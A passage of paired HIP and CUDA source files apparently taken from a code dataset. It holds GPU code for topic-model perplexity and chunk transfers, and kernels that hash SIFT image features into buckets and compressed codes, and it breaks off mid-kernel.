the launch. cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); goto Error; } // Copy output vector from GPU buffer to host memory. cudaStatus = cudaMemcpy(c, dev_c, size * sizeof(int), cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; } Error: cudaFree(dev_c); cudaFree(dev_a); cudaFree(dev_b); return cudaStatus; }
b6a89695e4ad878373ae2ecee66150d6518b26d6.hip
// !!! This is a file automatically generated by hipify!!! #include "Doc.cuh" Document::Document(string argFilePrefix, int argNumChunks, int argMaxTLLength, int argmaxDocLength, int argWordLength, int argNumGPUs) { filePrefix = argFilePrefix; numChunks = argNumChunks; maxTLLength = argMaxTLLength; maxDocLength = argmaxDocLength; wordLength = argWordLength; numGPUs = argNumGPUs; perplexityMid = new float[GridDim*BlockDim / 32]; //perplexityMid2 = new float[GridDim*BlockDim / 32]; perplexity = new float[maxTLLength]; } void Document::loadDocument() { TLLengthVec = new int[numChunks]; docLengthVec = new int[numChunks]; numOfTokenVecD = new int[numChunks]; numOfTokenVecS = new int[numChunks]; ifstream docLength((filePrefix + string("/docLength.txt")).c_str(), ios::binary);//store max Doc and DT length ifstream TLLength((filePrefix + string("/TLLength.txt")).c_str(), ios::binary); ifstream TLSplit((filePrefix + string("/TLSplit.txt")).c_str(), ios::binary); for (int chunkId = 0; chunkId < numChunks; chunkId++) { TLLength >> TLLengthVec[chunkId]; docLength >> docLengthVec[chunkId]; TLSplit >> numOfTokenVecD[chunkId] >> numOfTokenVecS[chunkId]; DocChunk tmpDocChunk(TLLengthVec[chunkId], docLengthVec[chunkId], wordLength); tmpDocChunk.CPUMemSet(); tmpDocChunk.loadChunk(filePrefix, chunkId); docChunkVec.push_back(tmpDocChunk); } printf("All chunks loaded!"); docLength.close(); TLLength.close(); } void Document::InitGPU() { for (int GPUId = 0; GPUId < numGPUs; GPUId++) { GPUChunk ChunkGPU(maxTLLength, maxDocLength, wordLength); ChunkGPU.GPUMemAllocate(GPUId); GPUChunkVec.push_back(ChunkGPU); } } void Document::CPU2GPUPerplexity(int argGPUId) { hipSetDevice(argGPUId); memset(perplexityMid, 0, GridDim*BlockDim / 32 * sizeof(float)); //memset(perplexityMid2, 0, GridDim*BlockDim / 32 * sizeof(float)); hipMemcpy(GPUChunkVec[argGPUId].devicePerplexityMid, perplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyHostToDevice); hipMemset(GPUChunkVec[argGPUId].devicePerplexity,0,maxTLLength*sizeof(float)); } void Document::GPU2CPUPerplexity(int argGPUId) { //hipSetDevice(argGPUId); //if (argGPUId == 0) { // hipMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} // //else { // hipMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} // ///*hipMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), hipMemcpyDeviceToHost);*/ //sumPerplexity = 0.0; //if (argGPUId == 0) { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid[i] / 467723.0; // } //} //else { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid2[i] / 467723.0; // } //} // //printf("Parallel Perplexity:%f \n", sumPerplexity); hipSetDevice(argGPUId); hipMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //else { // hipMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), hipMemcpyDeviceToHost); //} /*hipMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), hipMemcpyDeviceToHost);*/ sumPerplexity = 0.0; for (int i = 0; i < GridDim*BlockDim / 32; i++) { // printf("Perplexity:%f \n", h_PerplexityMid[i]); sumPerplexity += perplexityMid[i] / 467723.0; } printf("Parallel Perplexity:%f \n", sumPerplexity); } void Document::CPU2DiskPerplexity(string argFilePrefix) { ofstream OutPutPerplexity((argFilePrefix + string("/Perplexity.txt")).c_str(), ios::binary); for (int i = 0; i < maxTLLength; i++) { OutPutPerplexity << perplexity[i] << "\n"; } OutPutPerplexity.close(); } //void Document::GPUMemAllocate(int argGPUId) { // GPUId = argGPUId; // hipSetDevice(GPUId); // hipMalloc((void**)&deviceTLTopic, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&deviceTLDocCount, (maxDocLength) * sizeof(int)); // hipMalloc((void**)&deviceTLDocOffset, (maxDocLength) * sizeof(int)); // hipMalloc((void**)&deviceTLWordCount, (wordLength) * sizeof(int)); // hipMalloc((void**)&deviceTLWordOffset, (wordLength) * sizeof(int)); // hipMalloc((void**)&deviceMapWord2Doc, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&deviceMapDoc2Word, (maxTLLength) * sizeof(int)); // hipMalloc((void**)&devicePerplexity, (maxTLLength) * sizeof(float)); // hipMalloc((void**)&devicePerplexityMid, sizeof(float)*(GridDim*BlockDim / 32)); // // hipMalloc((void **)&d_blockCounter, sizeof(int)*(1)); // hipMalloc((void **)&d_warpCounter, sizeof(int)*(1)); // hipMalloc((void **)&d_dense, sizeof(int)*(GridDim*K)); // hipMalloc((void **)&deviceWTHeadDense, sizeof(float)*(GridDim*K)); // // // TLMemory = ((3 * maxTLLength + 2 * maxDocLength + 2 * wordLength + GridDim*K) * sizeof(int) + (maxTLLength + GridDim*BlockDim / 32 + GridDim*K) * sizeof(float))/ 1000000000.0; // // printf("Token list memory usage:%f GB\n", TLMemory); // // //} void Document::CPU2GPU(int argGPUId, int argChunkId) { hipSetDevice(argGPUId); hipMemcpy(GPUChunkVec[argGPUId].deviceTLTopic, docChunkVec[argChunkId].TLTopic, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLDocCount, docChunkVec[argChunkId].TLDocCount, (docLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLDocOffset, docChunkVec[argChunkId].TLDocOffset, (docLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLWordCount, docChunkVec[argChunkId].TLWordCount, (wordLength) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceTLWordOffset, docChunkVec[argChunkId].TLWordOffset, (wordLength) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceMapWord2Doc, docChunkVec[argChunkId].mapWord2Doc, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); hipMemcpy(GPUChunkVec[argGPUId].deviceMapDoc2Word, docChunkVec[argChunkId].mapDoc2Word, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyHostToDevice); } void Document::GPU2CPU(int argGPUId, int argChunkId) { hipSetDevice(argGPUId); hipMemcpy(docChunkVec[argChunkId].TLTopic, GPUChunkVec[argGPUId].deviceTLTopic, (TLLengthVec[argChunkId]) * sizeof(int), hipMemcpyDeviceToHost); }
b6a89695e4ad878373ae2ecee66150d6518b26d6.cu
#include "Doc.cuh" Document::Document(string argFilePrefix, int argNumChunks, int argMaxTLLength, int argmaxDocLength, int argWordLength, int argNumGPUs) { filePrefix = argFilePrefix; numChunks = argNumChunks; maxTLLength = argMaxTLLength; maxDocLength = argmaxDocLength; wordLength = argWordLength; numGPUs = argNumGPUs; perplexityMid = new float[GridDim*BlockDim / 32]; //perplexityMid2 = new float[GridDim*BlockDim / 32]; perplexity = new float[maxTLLength]; } void Document::loadDocument() { TLLengthVec = new int[numChunks]; docLengthVec = new int[numChunks]; numOfTokenVecD = new int[numChunks]; numOfTokenVecS = new int[numChunks]; ifstream docLength((filePrefix + string("/docLength.txt")).c_str(), ios::binary);//store max Doc and DT length ifstream TLLength((filePrefix + string("/TLLength.txt")).c_str(), ios::binary); ifstream TLSplit((filePrefix + string("/TLSplit.txt")).c_str(), ios::binary); for (int chunkId = 0; chunkId < numChunks; chunkId++) { TLLength >> TLLengthVec[chunkId]; docLength >> docLengthVec[chunkId]; TLSplit >> numOfTokenVecD[chunkId] >> numOfTokenVecS[chunkId]; DocChunk tmpDocChunk(TLLengthVec[chunkId], docLengthVec[chunkId], wordLength); tmpDocChunk.CPUMemSet(); tmpDocChunk.loadChunk(filePrefix, chunkId); docChunkVec.push_back(tmpDocChunk); } printf("All chunks loaded!"); docLength.close(); TLLength.close(); } void Document::InitGPU() { for (int GPUId = 0; GPUId < numGPUs; GPUId++) { GPUChunk ChunkGPU(maxTLLength, maxDocLength, wordLength); ChunkGPU.GPUMemAllocate(GPUId); GPUChunkVec.push_back(ChunkGPU); } } void Document::CPU2GPUPerplexity(int argGPUId) { cudaSetDevice(argGPUId); memset(perplexityMid, 0, GridDim*BlockDim / 32 * sizeof(float)); //memset(perplexityMid2, 0, GridDim*BlockDim / 32 * sizeof(float)); cudaMemcpy(GPUChunkVec[argGPUId].devicePerplexityMid, perplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyHostToDevice); cudaMemset(GPUChunkVec[argGPUId].devicePerplexity,0,maxTLLength*sizeof(float)); } void Document::GPU2CPUPerplexity(int argGPUId) { //cudaSetDevice(argGPUId); //if (argGPUId == 0) { // cudaMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} // //else { // cudaMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} // ///*cudaMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), cudaMemcpyDeviceToHost);*/ //sumPerplexity = 0.0; //if (argGPUId == 0) { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid[i] / 467723.0; // } //} //else { // for (int i = 0; i < GridDim*BlockDim / 32; i++) { // // printf("Perplexity:%f \n", h_PerplexityMid[i]); // sumPerplexity += perplexityMid2[i] / 467723.0; // } //} // //printf("Parallel Perplexity:%f \n", sumPerplexity); cudaSetDevice(argGPUId); cudaMemcpy(perplexityMid, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //else { // cudaMemcpy(perplexityMid2, GPUChunkVec[argGPUId].devicePerplexityMid, (GridDim*BlockDim / 32) * sizeof(float), cudaMemcpyDeviceToHost); //} /*cudaMemcpy(perplexity, GPUChunkVec[argGPUId].devicePerplexity, maxTLLength*sizeof(float), cudaMemcpyDeviceToHost);*/ sumPerplexity = 0.0; for (int i = 0; i < GridDim*BlockDim / 32; i++) { // printf("Perplexity:%f \n", h_PerplexityMid[i]); sumPerplexity += perplexityMid[i] / 467723.0; } printf("Parallel Perplexity:%f \n", sumPerplexity); } void Document::CPU2DiskPerplexity(string argFilePrefix) { ofstream OutPutPerplexity((argFilePrefix + string("/Perplexity.txt")).c_str(), ios::binary); for (int i = 0; i < maxTLLength; i++) { OutPutPerplexity << perplexity[i] << "\n"; } OutPutPerplexity.close(); } //void Document::GPUMemAllocate(int argGPUId) { // GPUId = argGPUId; // cudaSetDevice(GPUId); // cudaMalloc((void**)&deviceTLTopic, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLDocCount, (maxDocLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLDocOffset, (maxDocLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLWordCount, (wordLength) * sizeof(int)); // cudaMalloc((void**)&deviceTLWordOffset, (wordLength) * sizeof(int)); // cudaMalloc((void**)&deviceMapWord2Doc, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&deviceMapDoc2Word, (maxTLLength) * sizeof(int)); // cudaMalloc((void**)&devicePerplexity, (maxTLLength) * sizeof(float)); // cudaMalloc((void**)&devicePerplexityMid, sizeof(float)*(GridDim*BlockDim / 32)); // // cudaMalloc((void **)&d_blockCounter, sizeof(int)*(1)); // cudaMalloc((void **)&d_warpCounter, sizeof(int)*(1)); // cudaMalloc((void **)&d_dense, sizeof(int)*(GridDim*K)); // cudaMalloc((void **)&deviceWTHeadDense, sizeof(float)*(GridDim*K)); // // // TLMemory = ((3 * maxTLLength + 2 * maxDocLength + 2 * wordLength + GridDim*K) * sizeof(int) + (maxTLLength + GridDim*BlockDim / 32 + GridDim*K) * sizeof(float))/ 1000000000.0; // // printf("Token list memory usage:%f GB\n", TLMemory); // // //} void Document::CPU2GPU(int argGPUId, int argChunkId) { cudaSetDevice(argGPUId); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLTopic, docChunkVec[argChunkId].TLTopic, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLDocCount, docChunkVec[argChunkId].TLDocCount, (docLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLDocOffset, docChunkVec[argChunkId].TLDocOffset, (docLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLWordCount, docChunkVec[argChunkId].TLWordCount, (wordLength) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceTLWordOffset, docChunkVec[argChunkId].TLWordOffset, (wordLength) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceMapWord2Doc, docChunkVec[argChunkId].mapWord2Doc, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); cudaMemcpy(GPUChunkVec[argGPUId].deviceMapDoc2Word, docChunkVec[argChunkId].mapDoc2Word, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyHostToDevice); } void Document::GPU2CPU(int argGPUId, int argChunkId) { cudaSetDevice(argGPUId); cudaMemcpy(docChunkVec[argChunkId].TLTopic, GPUChunkVec[argGPUId].deviceTLTopic, (TLLengthVec[argChunkId]) * sizeof(int), cudaMemcpyDeviceToHost); }
ff98e2242f18b75d537e5ddbf722a8b2110189c8.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <thrust/sort.h> //#include <inttypes.h> #include "kernel_test.h" #include "Common.h" #define BLOCK_SIZE 32 #define TOP_PER_THREAD_HAMMING_LIST_SIZE 32 * 10 __global__ void compute_hash_kernel(ImageData *ptr, float* d_firstProjMat, float *d_secondProjMat, int imageIndex) { int index = blockIdx.x * blockDim.x + threadIdx.x; if (index < ptr->cntPoint) { //if (index == 2) { float sumFirstHash; for (int m = 0; m < kCntBucketGroup; m++){ int bucketid = 0; for (int j = 0; j < kCntBucketBit; j++) { sumFirstHash = 0.0f; for (int k = 0; k < kDimSiftData; k++) { sumFirstHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + k] * d_firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; } /*if (imageIndex == 0 && index == 0 && m == 0) printf("sum = %f\n", sumFirstHash);*/ bucketid = (bucketid << 1) + (sumFirstHash > 0 ? 1 : 0); //imgdata.point_to_bucket_map[point_number] = bucketid; } ptr->deviceBucketIDSiftPoint[ptr->cntPoint * m + index] = bucketid; /*if (imageIndex == 0 && index < 35 && m == 0){ printf("***my index is %d, my image index is %d, the bucketgroup is %d, the bucketId is %d\n", index, imageIndex, m, bucketid); }*/ } int sumSecondHash; for (int m = 0; m < kDimSiftData; m++) { sumSecondHash = 0.0f; for (int j = 0; j < kDimSiftData; j++) { //if (imageIndex == 0 && index == 0 && m == 0) // printf("sift data kernel= %d, second proj mat kernel= %f\n", ptr->deviceSiftDataPtrList[index * kDimSiftData + j], d_secondProjMat[m * kDimSiftData + j]); sumSecondHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + j] * d_secondProjMat[m * kDimSiftData + j]; } ptr->deviceHashDataPtrList[index * kDimSiftData + m] = (sumSecondHash > 0 ? 1 : 0); /*if (imageIndex == 0 && (index == 5) && m == 0) printf("second sum = %d\n", sumSecondHash);*/ } //printf("second hash value = %d", ptr->hashDataPtrList[127]); // calculate the CompHash code // compress <kBitInCompHash> Hash code bits within a single <uint64_t> variable for (int dimCompHashIndex = 0; dimCompHashIndex < kDimCompHashData; dimCompHashIndex++) { uint64_t compHashBitVal = 0; int dimHashIndexLBound = dimCompHashIndex * kBitInCompHash; int dimHashIndexUBound = (dimCompHashIndex + 1) * kBitInCompHash; for (int dimHashIndex = dimHashIndexLBound; dimHashIndex < dimHashIndexUBound; dimHashIndex++) { compHashBitVal = (compHashBitVal << 1) + ptr->deviceHashDataPtrList[index * kDimSiftData + dimHashIndex]; // set the corresponding bit to 1/0 } /*if (imageIndex == 0 && index == 0) { printf("hashdata %llu\n", compHashBitVal); }*/ ptr->compHashDataPtrList[index * kDimCompHashData + dimCompHashIndex] = compHashBitVal; //compHashDataPtr[dimCompHashIndex] = compHashBitVal; } // //if(imageIndex == 1 && index == 2414) { // printf("generated hash value %llu ====%llu\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); // //printf("compress 1: %lld, compress2: %lld\n", ptr->compHashDataPtrList[0], ptr->compHashDataPtrList[1]); //} } } void compute_hash_GPU(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat) { hipStream_t streams[img_cnt]; for (int i = 0; i < img_cnt; i++) { hipStreamCreate(&streams[i]); } for(int i = 0; i < img_cnt; i++){ //Parallel dim3 block(1024); dim3 grid((host_ptr->cntPoint + block.x - 1) / block.x); //std::cout << "block = " << block.x << " grid = " << grid.x << std::endl; hipLaunchKernelGGL(( compute_hash_kernel), dim3(grid), dim3(block), 0, streams[i], device_ptr[i], d_firstProjMat, d_secondProjMat, i); //hello<<<grid, block>>>(device_ptr[i], d_firstProjMat, d_secondProjMat, i); //CUDA_CHECK_ERROR; host_ptr++; } hipDeviceSynchronize(); } /* __global__ void hamming_distance_kernel(ImageData *imageData1, ImageData *imageData2, HashData *hashData1, HashData *hashData2, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList) { //int index = blockIdx.x * blockDim.x; int index = blockIdx.x; //printf("blockidx.x = %d, blockdim.x = %d\n", blockIdx.x, blockDim.x); int bucket_id; __shared__ uint16_t totalCandidateSiftPoints; __shared__ uint16_t *candidateSiftPointList; __shared__ uint8_t *candidateHammingDistance; if (index < imageData1->cntPoint) { if (threadIdx.x == 0) { totalCandidateSiftPoints = 0; //printf("%d\n", index); //printf("sift count 1: %d, sift count 2: %d \n", imageData1->cntPoint, imageData2->cntPoint); //printf("bucket count: %d, bucket point: %d \n", hashData1->deviceCntSiftPointInBucket[0], hashData2->deviceCntSiftPointInBucket[0]); for (int i = 0; i < kCntBucketGroup; i++) { bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; totalCandidateSiftPoints = totalCandidateSiftPoints + hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; } candidateSiftPointList = new uint16_t[totalCandidateSiftPoints]; candidateHammingDistance = new uint8_t[totalCandidateSiftPoints]; int dataIndex = 0; for (int i = 0; i < kCntBucketGroup; i++) { int countSiftPointsBucket = 0; bucket_id = imageData1->deviceBucketIDSiftPoint[imageData1->cntPoint * i + index]; countSiftPointsBucket = hashData2->deviceCntSiftPointInBucket[i * kCntBucketPerGroup + bucket_id]; for (int j = 0; j < countSiftPointsBucket; j++) { candidateSiftPointList[dataIndex] = hashData2->deviceBucketList[i * kCntBucketPerGroup + bucket_id][j]; dataIndex++; } } } } __syncthreads(); int64_t firstImageHashA, firstImageHashB, secondImageHashA, secondImageHashB; firstImageHashA = imageData1->compHashDataPtrList[index * kDimCompHashData]; firstImageHashB = imageData1->compHashDataPtrList[index * kDimCompHashData + 1]; for (int i = 0; i < int8_t((totalCandidateSiftPoints + BLOCK_SIZE - 1) / BLOCK_SIZE); i++){ if ((i * BLOCK_SIZE + threadIdx.x) < totalCandidateSiftPoints) { secondImageHashA = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData]; secondImageHashB = imageData2->compHashDataPtrList[candidateSiftPointList[i * BLOCK_SIZE + threadIdx.x] * kDimCompHashData + 1]; candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x] = __popcll(firstImageHashA ^ secondImageHashA) + __popcll(firstImageHashB ^ secondImageHashB); //if(index == 0){ //printf("hamming distance = %d \n", candidateHammingDistance[i * BLOCK_SIZE + threadIdx.x]); //} } } __syncthreads(); __shared__ uint16_t topKCandidates[kCntCandidateTopMin]; if (index < imageData1->cntPoint) { //if (threadIdx.x == 0 && index == 0) { int candidatesFoundCnt; if(threadIdx.x == 0){ //printf("image no= %d\n", imageData1->cntPoint); //printf("%d, %d\n", index, totalCandidateSiftPoints); thrust::sort_by_key(thrust::seq, candidateHammingDistance, candidateHammingDistance + totalCandidateSiftPoints, candidateSiftPointList); candidatesFoundCnt = 0; uint16_t candidate; bool duplicate; for(int i = 0; i < totalCandidateSiftPoints; i++){ duplicate = false; //printf("Index: %d, The sorted hamming distance:%d\n", i, candidateHammingDistance[i]); //printf("The corresponding point is:%d\n", candidateSiftPointList[i]); candidate = candidateSiftPointList[i]; for(int j = 0; j < candidatesFoundCnt; j++){ if(candidate == topKCandidates[j]) { duplicate = true; } } if(duplicate == true){ continue; } topKCandidates[candidatesFoundCnt] = candidate; candidatesFoundCnt++; if(candidatesFoundCnt == kCntCandidateTopMin) { break; } } //printf("max = %d, \n", max); for(int i = 0; i < candidatesFoundCnt; i++){ //if (index == 100) //printf("index: %d, The candidate is %d\n", index, topKCandidates[i]); deviceCandidateList[index * kCntCandidateTopMin + i] = topKCandidates[i]; } deviceCandidateCntList[index] = candidatesFoundCnt; } } if(threadIdx.x == 0 && index < imageData1->cntPoint){ delete[] candidateSiftPointList; } } void compute_hamming_distance_GPU(ImageData *deviceptr1, ImageData* deviceptr2, HashData *hashData1, HashData *hashData2, int siftCount, uint16_t* deviceCandidateList, uint8_t* deviceCandidateCntList){ dim3 block(BLOCK_SIZE); dim3 grid(siftCount); hamming_distance_kernel<<<grid, block>>>(deviceptr1, deviceptr2, hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hamming_distance_kernel<<<grid, block>>>(deviceptr[4], deviceptr[5], hashData1, hashData2, deviceCandidateList, deviceCandidateCntList); //hipDeviceSynchronize(); } */ void compute_hashes_serial(ImageData **device_ptr, ImageData *host_ptr ,int img_cnt, float *d_firstProjMat, float *d_secondProjMat, float *firstProjMat){ //Serial //for (int dataIndex = 0; dataIndex < host_ptr->cntPoint; dataIndex++) //{ // // obtain pointers for SIFT feature vector, Hash code and CompHash code // SiftDataPtr siftDataPtr = host_ptr->siftDataPtrList[dataIndex]; // int bucketID = 0; // // determine the bucket index for each bucket group // for (int m = 0; m < kCntBucketGroup; m++) { // bucketID = 0; // for (int j = 0; j < kCntBucketBit; j++) { // float sum = 0.0f; // for (int k = 0; k < kDimSiftData; k++) { // if (i == 0 && dataIndex == 0 && m == 0) { // //std::cout << "proj data inside fun" << firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k] << std::endl; // //printf("sift data = %d, proj data = %f\n", siftDataPtr[k], firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]); // } // if (siftDataPtr[k] != 0) { // sum += siftDataPtr[k] * firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; // } // } // // if (i == 0 && dataIndex == 0 && m == 0) { // printf("sum = %f\n", sum); // } // bucketID = (bucketID << 1) + (sum > 0 ? 1 : 0); // } // if (i == 0 && dataIndex == 0 && m == 0) { // printf("===============index = %d, group index = %d, bucket id = %d, image no = %d\n===================", dataIndex, m, bucketID, i); // } // } //} // } // //typedef struct StructA { // SiftDataPtr *arrval; // int flag; //} StructA; // //__global__ void kernel(StructA *in) { // // for (int i = 0; i < 2; i++) { // //printf("flag val = %d\n", in[i].flag); // //printf("address = %p\n", in[i].arrval); // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // //printf("address = %p\n", &in[i].arrval[j * 5 + k]); // //printf("val = %d\n", in[i].arrval[j * 5 + k]); // printf("val = %d\n", d_arrval[i][j * 5 + k]); // } // } // printf("-------------------------------------------\n"); // } //} // //void call_kernel_test2() //{ // StructA *h_a, *d_a; // // printf("h_a address:%p\n", h_a); // h_a = (StructA*)malloc(2 * sizeof(StructA)); // printf("h_a address:%p\n", h_a); // // for (int i = 0; i < 2; i++) { // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // h_a[i].arrval = (SiftDataPtr*)malloc(3 * sizeof(SiftDataPtr)); // printf("h_a[%d] arrval address:%p\n", i, h_a[i].arrval); // for (int j = 0; j < 3; j++) { // h_a[i].arrval[j] = (int*)malloc(5 * sizeof(int)); // } // } // // int counter = 0; // for (int i = 0; i < 2; i++) { // for (int j = 0; j < 3; j++) { // for (int k = 0; k < 5; k++) { // counter += 1; // h_a[i].arrval[j][k] = counter; // } // //printf("\n"); // } // h_a[i].flag = counter; // } // // /*for (int i = 0; i < 2; i++) { // for (int j = 0; j < 8; j++) { // for (int k = 0; k < 5; k++) // printf("val = %d\t", h_a[i].arrval[j][k]); // printf("\n"); // } // printf("-------------------------------------------\n"); // }*/ // // // 1. Allocate device array. // // size_t sz = 0; // hipDeviceGetLimit(&sz, hipLimitMallocHeapSize); // printf("heap size:%ld\n", sz); // // hipMalloc(&d_a, sizeof(StructA) * 2); // CUDA_CHECK_ERROR; // hipMemcpy(d_a, h_a, sizeof(StructA) * 2, hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // // int *d_arrval[2]; // // for (int i = 0; i < 2; i++) { // hipMalloc(&d_arrval[i], 3 * 5 * sizeof(int)); // hipMemcpy(&d_a[i].arrval, &d_arrval[i], sizeof(int*), hipMemcpyHostToDevice); // for (int j = 0; j < 3; j++) { // hipMemcpy(&d_arrval[i][j], h_a[i].arrval[j], 5 * sizeof(int), hipMemcpyHostToDevice); // } // } // // // 4. Call kernel with host struct as argument // kernel<<<1, 1>>>(d_a); // // // 5. Copy pointer from device to host. // //hipMemcpy(h_arr, d_arr, sizeof(int)*10, hipMemcpyDeviceToHost); // // // 6. Point to host pointer in host struct // // (or do something else with it if this is not needed) // //h_a.arr = h_arr; // //} // //class Particle //{ //public: // double *_w; //}; // //__global__ void test(Particle *p) { // // int idx = threadIdx.x + blockDim.x*blockIdx.x; // // if (idx == 2) { // printf("dev_p[2]._w[2] = %f\n", p[idx]._w[2]); // } //} // //void call_kernel_test3() //{ // int nParticles = 100; // Particle *dev_p; // double *w[nParticles]; // hipMalloc((void**)&dev_p, nParticles * sizeof(Particle)); // CUDA_CHECK_ERROR; // // for (int i = 0; i < nParticles; i++) { // hipMalloc((void**)&(w[i]), 300 * sizeof(double)); // CUDA_CHECK_ERROR; // hipMemcpy(&(dev_p[i]._w), &(w[i]), sizeof(double *), hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // } // double testval = 32.7; // hipMemcpy(w[2] + 2, &testval, sizeof(double), hipMemcpyHostToDevice); // CUDA_CHECK_ERROR; // test << <1, 32 >> >(dev_p); // hipDeviceSynchronize(); // CUDA_CHECK_ERROR; // printf("Done!\n"); //}
ff98e2242f18b75d537e5ddbf722a8b2110189c8.cu
#include <iostream> #include <thrust/sort.h> //#include <inttypes.h> #include "kernel_test.h" #include "Common.h" #define BLOCK_SIZE 32 #define TOP_PER_THREAD_HAMMING_LIST_SIZE 32 * 10 __global__ void compute_hash_kernel(ImageData *ptr, float* d_firstProjMat, float *d_secondProjMat, int imageIndex) { int index = blockIdx.x * blockDim.x + threadIdx.x; if (index < ptr->cntPoint) { //if (index == 2) { float sumFirstHash; for (int m = 0; m < kCntBucketGroup; m++){ int bucketid = 0; for (int j = 0; j < kCntBucketBit; j++) { sumFirstHash = 0.0f; for (int k = 0; k < kDimSiftData; k++) { sumFirstHash += ptr->deviceSiftDataPtrList[index * kDimSiftData + k] * d_firstProjMat[m * kDimSiftData * kCntBucketBit + j * kDimSiftData + k]; } /*if (imageIndex == 0 && index == 0 && m == 0) printf("sum = %f\n", sumFirstHash);*/ bucketid = (bucketid << 1) + (sumFirstHash > 0 ? 1 : 0); //imgdata.point_to_bucket_map[point_number] = bucketid; } ptr->deviceBucketIDSiftPoint[ptr->cntPoint * m + index] = bucketid; /*if (imageIndex == 0 && index < 35 && m == 0){ printf("***my index is %d, my image index is %d, the bucketgroup is %d, the bucketId is %d\n", index, imageIndex, m, bucketid); }*/ } int sumSecondHash; for (int m = 0; m < kDimSiftData; m++) { sumSecondHash = 0.0f; for (int j = 0; j < kDimSiftData; j++) { //if (imageIndex == 0 && index == 0 && m == 0) // printf("sift data kernel= %d, second proj mat kernel= %f\n", ptr->deviceSiftDataPtrList[index * kDimSiftData + j], d_secondProjMat[m * kDimSiftData + j]); sumSecondHash += ptr->deviceSiftDataPtrList[index * 